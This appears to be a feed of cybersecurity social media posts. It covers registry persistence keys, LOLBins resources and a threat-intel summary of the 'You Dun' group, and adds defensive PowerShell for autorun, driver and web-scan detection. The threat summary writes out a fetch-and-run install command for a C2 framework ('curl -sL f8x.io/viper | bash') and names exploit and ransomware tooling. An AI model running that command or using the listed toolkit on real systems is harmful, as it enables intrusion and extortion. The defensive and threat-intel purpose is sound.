youtube.com/clip/UgkxTSp...
When we’re quick to give advice, what happens?
Someone forgot to filter for prompt injection...
Hayo,
I built my web app, which searches Google and then outputs the search results along with an AI summary for each result!! Isn't that amazing 😍
my-threat-news.vercel.app
How do you exit vim?
Ever used forensics for threat detection?
If yes, please explain.
Registry Settings for Code Persistence
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run: programs listed here start automatically for all users at system startup.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: programs listed here start automatically for the current user at login.
Important registry files:
%SYSTEMROOT%\system32\config
-- SYSTEM
-- SOFTWARE
-- SAM
-- SECURITY
user profile (e.g., c:\users\administrator)
-- NTUSER.DAT
-- USRCLASS.DAT
C:\Windows\appcompat\Programs\
-- AMCACHE.HVE
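As an added example (not code from the original post), the following PowerShell enumerates the Run keys listed above and goes slightly beyond them: it also covers RunOnce and the WOW6432Node view, and walks every user hive currently loaded under HKEY_USERS instead of only HKCU. Each value is resolved to its executable, which is then checked for existence and Authenticode status. The key list, the `Get-AutorunImage` / `Get-RunKeyAutoruns` names and the `Signature -ne 'Valid'` filter are this example's own choices; it assumes an elevated PowerShell session on Windows.

```powershell
# Added example, not part of the original post. Enumerates the Run autostart
# values above (plus RunOnce and the WOW6432Node view) for HKLM and for every
# user hive currently loaded under HKEY_USERS, resolves each command to its
# executable and checks whether that file exists and carries a valid signature.
# Assumes an elevated PowerShell session on Windows.

$runKeys = @(
    'Software\Microsoft\Windows\CurrentVersion\Run',
    'Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# HKLM plus each loaded user hive (NTUSER.DAT). The *_Classes hives are
# USRCLASS.DAT and do not hold Run keys, so they are skipped.
$roots = @('HKLM:') + @(Get-ChildItem 'Registry::HKEY_USERS' |
    Where-Object { $_.PSChildName -notmatch '_Classes$' } |
    ForEach-Object { "Registry::HKEY_USERS\$($_.PSChildName)" })

function Get-AutorunImage {
    # Extract the executable from a Run value: a quoted path, or the first token.
    param([string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($CommandLine -split '\s+')[0]
}

function Get-RunKeyAutoruns {
    foreach ($root in $roots) {
        foreach ($key in $runKeys) {
            $path = "$root\$key"
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $values = Get-ItemProperty -LiteralPath $path
            foreach ($v in $values.PSObject.Properties) {
                # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip those
                if ($v.Name -like 'PS*') { continue }
                $image = [Environment]::ExpandEnvironmentVariables((Get-AutorunImage "$($v.Value)"))
                $status = 'MISSING'
                if ($image -and (Test-Path -LiteralPath $image)) {
                    $status = (Get-AuthenticodeSignature -FilePath $image).Status
                }
                [PSCustomObject]@{
                    Key       = $path
                    Name      = $v.Name
                    Image     = $image
                    Signature = $status
                    Command   = $v.Value
                }
            }
        }
    }
}

# Unsigned, tampered or missing images are the ones worth a closer look
Get-RunKeyAutoruns | Where-Object { $_.Signature -ne 'Valid' } | Format-Table -AutoSize
```

Bare image names such as `rundll32.exe` resolve through PATH at logon and therefore show up as MISSING here; resolve them with `Get-Command` if you want them scored too. For an offline disk image the same keys live in the SOFTWARE and NTUSER.DAT hives listed above; load them with `reg load` (or a hive parser) and point `$roots` at the mounted location.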
It seems like a remote job is a good idea *manifesting*
I do consider myself highly qualified for the job of cybersecurity operations manager, but I always get hit by audits because the way I look at it is that I see operational issues and I fix them, but to the audits they want, let's say,
number of vulnerabilities patched when in fact the scanner wasn't functioning properly so the number is not accurate 🫢 and the list of issues goes on
Or how many incidents have occurred when in fact there were no detection rules activated to detect any!
Totally agree
People who work in cyber security at highly regulated companies.. how do you manage the pressure of compliance, especially when IT fails to provide the necessary support or even follow basic cybersecurity guidelines?
Every time I feel like I'm making progress, whether by implementing a new solution or improving a process, I get hit by regulatory checks that expose fundamental gaps.
And just when we think we're ahead,
Suddenly, all our efforts feel like they're unseen, and we're back to square one.
You’re welcome
I am on a mission to complete all defensive security badges in Cybrary because why NOT!
Yeah, I did install it on my PC; it's easy to set up 👍🏼
I stumbled upon this open-source ChatGPT alternative that runs 100% offline!
jan.ai
Deepseek has been my daily driver for a while and what most don't know is that it is suspiciously good at writing offsec tools...
LOLBins/LOLDrivers key resources:
→ LOLBAS: [lolbas-project.github.io](https://lolbas-project.github.io)
→ LOLDrivers: [loldrivers.io](https://www.loldrivers.io)
Detect abused tools & malicious drivers.
#LOLBins #LOLDrivers
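As an added example (not code from the original post or from the LOLDrivers project), the PowerShell below hashes every kernel driver registered on the host and matches it against a LOLDrivers-style SHA256 blocklist. The blocklist is a constructed placeholder, not real LOLDrivers data, and the function name `Get-RegisteredDrivers` is this example's own; it assumes an elevated PowerShell session on Windows.

```powershell
# Added example, not part of the original post: hash every kernel driver
# registered on the host and match it against a LOLDrivers-style blocklist.
# The blocklist below is CONSTRUCTED for illustration (placeholder hash, not a
# real LOLDrivers entry); populate it from the project's published data.
# Assumes an elevated PowerShell session on Windows.

# SHA256 (uppercase hex, as Get-FileHash emits it) -> label
$blocklist = @{
    '0000000000000000000000000000000000000000000000000000000000000001' = 'placeholder-vulnerable.sys'
}

function Get-RegisteredDrivers {
    # Win32_SystemDriver lists every kernel driver registered as a service;
    # State = Running means the image is loaded in the kernel right now.
    Get-CimInstance Win32_SystemDriver | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        # PathName comes in several shapes: \??\C:\..., \SystemRoot\System32\...,
        # or a path relative to %SystemRoot%. Normalise to a plain Win32 path.
        $path = $path -replace '^\\\?\?\\', ''
        $path = $path -replace '^\\SystemRoot\\', ($env:SystemRoot + '\')
        if (-not [IO.Path]::IsPathRooted($path)) { $path = Join-Path $env:SystemRoot $path }
        if (-not (Test-Path -LiteralPath $path)) { return }
        $sig = Get-AuthenticodeSignature -FilePath $path
        $signer = $null
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        [PSCustomObject]@{
            Name      = $_.Name
            State     = $_.State
            Path      = $path
            SHA256    = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            Signer    = $signer
            SigStatus = $sig.Status
        }
    }
}

$drivers = Get-RegisteredDrivers
# Known-vulnerable drivers are usually validly signed, so signature status alone
# does not flag BYOVD; the hash match is the useful signal.
$drivers | Where-Object { $blocklist.ContainsKey($_.SHA256) } |
    Select-Object Name, State, Path, SHA256, Signer
```

The point of the `SigStatus` column is the caveat above: a "bring your own vulnerable driver" attack loads a legitimately signed driver, so a valid signature is not evidence of safety; only the hash (or the signer plus version) identifies a known-abusable image. Hashing every `*.sys` under `C:\Windows\System32\drivers` as well catches drivers that have been staged on disk but not yet registered.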
🚨 the "You Dun" Threat Group
3. Xray
- Mass vulnerability scanner probing Chinese websites for misconfigurations.
- TTP: Focuses on CMS platforms and IoT devices.
- Detect: Watch for aggressive scanning patterns (e.g., 10+ unique paths/sec).
4. Dirsearch
- Directory brute-forcer to map exposed endpoints.
- TTP: Targets `/wp-admin`, `/backup`, and other sensitive paths.
- Detect: Block IPs with repetitive `404`/`403` errors in short timeframes.
Exploitation toolkit:
5. SQLmap
- Automated SQLi tool used to dump databases.
6. Seeyon_exp
- Custom exploit.
7. Weaver_exp
- Zhiyuan OA weaponizer leveraging deserialization flaws.
Command & Control (C2)
8. Cobalt Strike
- Plugins:
  - TaoWu: Drops `SharpHound.exe` for AD recon and `JuicyPotato.dll` for privilege escalation.
  - Ladon: Automates payload execution across Windows domains.
9. Viper C2
- Installation: Deployed via `curl -sL f8x.io/viper | bash`.
Privilege Escalation
10. Traitor
- Exploits Linux vulns (e.g., CVE-2021-4034) for root access.
11. CDK
- Escapes Docker via `mount-cgroup` and deploys crypto miners.
12. LockBit 3.0 Builder
- Custom `LB3.exe` drops ransom notes linking to `t.me/You_Dun`.
13. Telegram & Redis
- Telegram channel `You_Dun` for victim shaming.
→ [The DFIR Report](https://thedfirreport.com)
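As an added example (not code from the original post or from The DFIR Report), the PowerShell below implements the two detection ideas from items 3 and 4: a burst of `403`/`404` responses from one IP inside a short window, and many unique paths per second from one IP. The log lines are constructed Combined Log Format samples, not real traffic, and the thresholds, window and the function names `Find-ErrorBursts` / `Find-FastScanners` are this example's own assumptions.

```powershell
# Added example, not part of the original post: the two detection heuristics
# above (repeated 404/403 from one IP, many unique paths per second from one
# IP) run over CONSTRUCTED Combined Log Format lines. Thresholds are
# assumptions; tune them to your traffic.

$errorThreshold    = 5    # 403/404 responses from one IP inside the window
$windowSeconds     = 60
$uniquePathsPerSec = 10   # the "10+ unique paths/sec" heuristic from the post

# Constructed sample log lines (not real traffic)
$log = @'
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /wp-admin HTTP/1.1" 403 199 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /backup HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /admin HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /phpmyadmin HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "python-requests/2.31"
198.51.100.2 - - [10/Oct/2024:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2024:13:56:02 +0000] "GET /missing.png HTTP/1.1" 404 153 "-" "Mozilla/5.0"
'@

# Combined Log Format: ip ident user [timestamp] "METHOD path proto" status ...
$pattern = '^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+)[^"]*" (?<status>\d{3})'

$events = foreach ($line in ($log -split "`r?`n")) {
    if ($line -match $pattern) {
        # Drop the zone offset; all lines here are UTC so ordering is preserved
        $ts = ($Matches.ts -split ' ')[0]
        [PSCustomObject]@{
            Ip     = $Matches.ip
            Time   = [DateTime]::ParseExact($ts, 'dd/MMM/yyyy:HH:mm:ss',
                         [Globalization.CultureInfo]::InvariantCulture)
            Path   = $Matches.path
            Status = [int]$Matches.status
        }
    }
}

function Find-ErrorBursts {
    # Flags an IP once $Threshold 403/404 responses fall inside $WindowSeconds
    # (sliding window over the sorted timestamps).
    param($Events, [int]$Threshold, [int]$WindowSeconds)
    $Events | Where-Object { $_.Status -in @(403, 404) } | Group-Object Ip | ForEach-Object {
        $times = @($_.Group | Sort-Object Time | ForEach-Object { $_.Time })
        for ($i = 0; $i + $Threshold - 1 -lt $times.Count; $i++) {
            $j = $i + $Threshold - 1
            if (($times[$j] - $times[$i]).TotalSeconds -le $WindowSeconds) {
                [PSCustomObject]@{ Ip = $_.Name; Rule = 'error-burst'; Count = $times.Count; Start = $times[$i] }
                break
            }
        }
    }
}

function Find-FastScanners {
    # Flags an IP that requests $UniquePathsPerSecond or more distinct paths
    # within any single second.
    param($Events, [int]$UniquePathsPerSecond)
    $Events | Group-Object Ip | ForEach-Object {
        $ip = $_.Name
        $_.Group | Group-Object { $_.Time.ToString('s') } | ForEach-Object {
            $unique = @($_.Group.Path | Select-Object -Unique).Count
            if ($unique -ge $UniquePathsPerSecond) {
                [PSCustomObject]@{ Ip = $ip; Rule = 'path-sweep'; Count = $unique; Start = $_.Group[0].Time }
            }
        }
    }
}

Find-ErrorBursts  -Events $events -Threshold $errorThreshold -WindowSeconds $windowSeconds
Find-FastScanners -Events $events -UniquePathsPerSecond $uniquePathsPerSec
```

With the sample above only the error-burst rule fires (203.0.113.7, six 403/404s in two seconds); the path-sweep rule needs ten distinct paths in one second, which the short sample does not contain. Both rules key on the client IP, so put them behind your proxy's `X-Forwarded-For` handling first, or every scanner will look like the load balancer.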